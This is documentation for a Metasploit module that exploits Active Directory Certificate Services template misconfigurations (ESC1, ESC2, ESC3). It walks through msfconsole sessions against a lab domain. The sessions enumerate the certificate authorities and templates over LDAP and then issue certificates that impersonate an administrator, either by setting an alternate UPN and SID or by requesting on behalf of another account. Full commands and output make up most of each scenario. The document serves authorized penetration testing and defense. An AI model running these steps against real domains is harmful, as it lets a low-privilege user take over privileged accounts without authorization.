Link Search Menu Expand Document

Vulnerable Application

Request certificates via MS-ICPR (Active Directory Certificate Services). Depending on the certificate template’s configuration the resulting certificate can be used for various operations such as authentication. PFX certificate files that are saved are encrypted with a blank password.

This module is capable of exploiting ESC1, ESC2, ESC3 and ESC13.

Module usage

  1. From msfconsole
  2. Do: use auxiliary/admin/dcerpc/icpr_cert
  3. Set the CA, RHOSTS, SMBUser and SMBPass options
  4. Run the module and see that a new certificate was issued or submitted

Options

CA

The target certificate authority. The default value used by AD CS is $domain-DC-CA.

CERT_TEMPLATE

The certificate template to issue, e.g. “User”.

ALT_DNS

Alternative DNS name to specify in the certificate. Useful in certain attack scenarios.

ALT_SID

Alternative object SID to specify in the NTDS_CA_SECURITY_EXT extension. This is useful when exploiting ESC1 on a target where the KB5014754 patch has been applied.

See the following resources for more information.

  • https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7
  • https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-8ae0f4304c1d

ALT_UPN

Alternative User Principal Name (UPN) to specify in the certificate. Useful in certain attack scenarios. This is in the format $username@$dnsDomainName.

PFX

Certificate to request on behalf of. This is a PKCS12 file (using the .pfx extension), such as a one generated by previously running this module.

ON_BEHALF_OF

Username to request on behalf of. This is in the format $domain\\$username.

DigestAlgorithm

This is an advanced option.

The digest algorithm to use for cryptographic signing operations.

Actions

REQUEST_CERT

Request a certificate. The certificate PFX file will be stored on success. The certificate file’s password is blank.

Scenarios

Obtaining Configuration Values

For this module to work, it’s necessary to know the name of a CA and certificate template. These values can be obtained by a normal user via LDAP.

msf6 > use auxiliary/gather/ldap_query
msf6 auxiliary(gather/ldap_query) > set BIND_DN aliddle@msflab.local
BIND_DN => aliddle@msflab.local
msf6 auxiliary(gather/ldap_query) > set BIND_PW Password1!
BIND_PW => Password1!
msf6 auxiliary(gather/ldap_query) > set ACTION ENUM_AD_CS_CAS
ACTION => ENUM_AD_CS_CAS
msf6 auxiliary(gather/ldap_query) > run
[*] Running module against 192.168.159.10

[+] Successfully bound to the LDAP server!
[*] Discovering base DN automatically
[+] 192.168.159.10:389 Discovered base DN: DC=msflab,DC=local
CN=msflab-DC-CA CN=Enrollment Services CN=Public Key Services CN=Services CN=Configuration DC=msflab DC=local
=============================================================================================================

 Name                  Attributes
 ----                  ----------
 cacertificatedn       CN=msflab-DC-CA, DC=msflab, DC=local
 certificatetemplates  ESC1-Test || Workstation || ClientAuth || DirectoryEmailReplication || DomainControllerAuthentication || KerberosAuthentication || EFSRecovery || EFS || DomainController || WebServer || Machine || User || SubCA |
                       | Administrator
 cn                    msflab-DC-CA
 dnshostname           DC.msflab.local
 name                  msflab-DC-CA

[*] Auxiliary module execution completed
msf6 auxiliary(gather/ldap_query) >

Issue A Generic Certificate

In this scenario, an authenticated user issues a certificate for themselves using the User template which is available by default. The user must know the CA name, which in this case is msflab-DC-CA.

msf6 > use auxiliary/admin/dcerpc/icpr_cert
msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
SMBUser => aliddle
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
SMBPass => Password1!
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
CA => msflab-DC-CA
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
CERT_TEMPLATE => User
msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 192.168.159.10

[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 192.168.159.10:445 - Binding to \cert...
[+] 192.168.159.10:445 - Bound to \cert
[*] 192.168.159.10:445 - Requesting a certificate...
[+] 192.168.159.10:445 - The requested certificate was issued.
[*] 192.168.159.10:445 - Certificate UPN: aliddle@msflab.local
[*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1106
[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20220824125053_default_unknown_windows.ad.cs_545696.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) >

Issue A Certificate With A Specific subjectAltName (AKA ESC1)

In this scenario, an authenticated user exploits a misconfiguration allowing them to issue a certificate for a different User Principal Name (UPN), typically one that is an administrator. Exploiting this misconfiguration to specify a different UPN effectively issues a certificate that can be used to authenticate as another user. If the target server has the KB5014754 patch applied and the REG_DWORD HKLM\SYSTEM\CurrentControlSet\Services\Kdc\StrongCertificateBindingEnforcement value is set to 2, then the SID for the account with the specified UPN should be supplied as well. In November of 2023, Microsoft will change the default value of StrongCertificateBindingEnforcement to 2. If the server has the patch applied, the SID will be returned in the issued certificate which ensures that the required strong mapping is in place. If the strong mapping is required and the SID is not specified in the certificate, then Kerberos authentication will fail with KDC_ERR_CERTIFICATE_MISMATCH.

The user must know:

  • A vulnerable certificate template, in this case ESC1-Test.
  • The SID of a target account, in this case S-1-5-21-3402587289-1488798532-3618296993-1000
  • The UPN of a target account, in this case smcintyre@msflab.local.

See Certified Pre-Owned section on ESC1 for more information.

msf6 > use auxiliary/admin/dcerpc/icpr_cert
msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
SMBUser => aliddle
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
SMBPass => Password1!
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
CA => msflab-DC-CA
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC1-Test
CERT_TEMPLATE => ESC1-Test
msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_SID S-1-5-21-3402587289-1488798532-3618296993-1000
ALT_SID => S-1-5-21-3402587289-1488798532-3618296993-1000
msf6 auxiliary(admin/dcerpc/icpr_cert) > set ALT_UPN smcintyre@msflab.local
ALT_UPN => smcintyre@msflab.local
msf6 auxiliary(admin/dcerpc/icpr_cert) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 192.168.159.10

[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 192.168.159.10:445 - Binding to \cert...
[+] 192.168.159.10:445 - Bound to \cert
[*] 192.168.159.10:445 - Requesting a certificate for user aliddle - alternate UPN: smcintyre@msflab.local - digest algorithm: SHA256 - template: ESC1-Test
[+] 192.168.159.10:445 - The requested certificate was issued.
[*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1000
[*] 192.168.159.10:445 - Certificate UPN: smcintyre@msflab.local
[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20230608111432_default_192.168.159.10_windows.ad.cs_029062.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) > 

Issue A Certificate With The Any Purpose EKU (AKA ESC2)

In this scenario, an authenticated user exploits a misconfiguration allowing them to issue a certificate from a template that either contains the Any Purpose EKU or no EKUs at all.

The user must know:

  • A vulnerable certificate template, in this case ESC2-Test.
  • A target account, in this case MSFLAB\smcintyre.

See Certified Pre-Owned section on ESC2 for more information.

Step 1

The first step is to issue a certificate using the vulnerable certificate template.

msf6 > use auxiliary/admin/dcerpc/icpr_cert 
msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
SMBUser => aliddle
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
SMBPass => Password1!
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
CA => msflab-DC-CA
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC2-Test
CERT_TEMPLATE => ESC2-Test
msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 192.168.159.10

[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 192.168.159.10:445 - Binding to \cert...
[+] 192.168.159.10:445 - Bound to \cert
[*] 192.168.159.10:445 - Requesting a certificate...
[+] 192.168.159.10:445 - The requested certificate was issued.
[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) >

Step 2

The second step is to run the module a second time, using the certificate template to request a certificate on behalf of the target user. The CERT_TEMPLATE option is updated to one allowing authentication such as the default User template.

msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx
PFX => /home/smcintyre/.msf4/loot/20221107153602_default_unknown_windows.ad.cs_269882.pfx
msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF MSFLAB\\smcintyre
ON_BEHALF_OF => MSFLAB\smcintyre
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
CERT_TEMPLATE => User
msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 192.168.159.10

[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 192.168.159.10:445 - Binding to \cert...
[+] 192.168.159.10:445 - Bound to \cert
[*] 192.168.159.10:445 - Building certificate request on behalf of MSFLAB\smcintyre
[*] 192.168.159.10:445 - Requesting a certificate...
[+] 192.168.159.10:445 - The requested certificate was issued.
[*] 192.168.159.10:445 - Certificate UPN: smcintyre@msflab.local
[*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1000
[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20221107153713_default_unknown_windows.ad.cs_275853.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) >

Issue A Certificate With The Certificate Request Agent EKU (AKA ESC3)

In this scenario, an authenticated user exploits a misconfiguration allowing them to issue a certificate from a template that either contains the Certificate Request Agent EKU.

The user must know:

  • A vulnerable certificate template, in this case ESC3-Test.
  • A target account, in this case MSFLAB\smcintyre.

The steps are identical to ESC2. First a certificate is requested using the vulnerable template. Then it is used to request another certificate on behalf of the target account.

Step 1

The first step is to issue a certificate using the vulnerable certificate template.

msf6 > use auxiliary/admin/dcerpc/icpr_cert
msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 192.168.159.10
RHOSTS => 192.168.159.10
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser aliddle
SMBUser => aliddle
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass Password1!
SMBPass => Password1!
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA msflab-DC-CA
CA => msflab-DC-CA
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC3-Test
CERT_TEMPLATE => ESC3-Test
msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 192.168.159.10

[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 192.168.159.10:445 - Binding to \cert...
[+] 192.168.159.10:445 - Bound to \cert
[*] 192.168.159.10:445 - Requesting a certificate...
[+] 192.168.159.10:445 - The requested certificate was issued.
[*] 192.168.159.10:445 - Certificate UPN: aliddle@msflab.local
[*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1106
[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) >

Step 2

The second step is to run the module a second time, using the certificate template to request a certificate on behalf of the target user. The CERT_TEMPLATE option is updated to one allowing authentication such as the default User template.

msf6 auxiliary(admin/dcerpc/icpr_cert) > set PFX /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx
PFX => /home/smcintyre/.msf4/loot/20221107154656_default_unknown_windows.ad.cs_831021.pfx
msf6 auxiliary(admin/dcerpc/icpr_cert) > set ON_BEHALF_OF MSFLAB\\smcintyre
ON_BEHALF_OF => MSFLAB\smcintyre
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE User
CERT_TEMPLATE => User
msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 192.168.159.10

[*] 192.168.159.10:445 - Connecting to ICertPassage (ICPR) Remote Protocol
[*] 192.168.159.10:445 - Binding to \cert...
[+] 192.168.159.10:445 - Bound to \cert
[*] 192.168.159.10:445 - Building certificate request on behalf of MSFLAB\smcintyre
[*] 192.168.159.10:445 - Requesting a certificate...
[+] 192.168.159.10:445 - The requested certificate was issued.
[*] 192.168.159.10:445 - Certificate UPN: smcintyre@msflab.local
[*] 192.168.159.10:445 - Certificate SID: S-1-5-21-3402587289-1488798532-3618296993-1000
[*] 192.168.159.10:445 - Certificate stored at: /home/smcintyre/.msf4/loot/20221107154740_default_unknown_windows.ad.cs_567059.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) >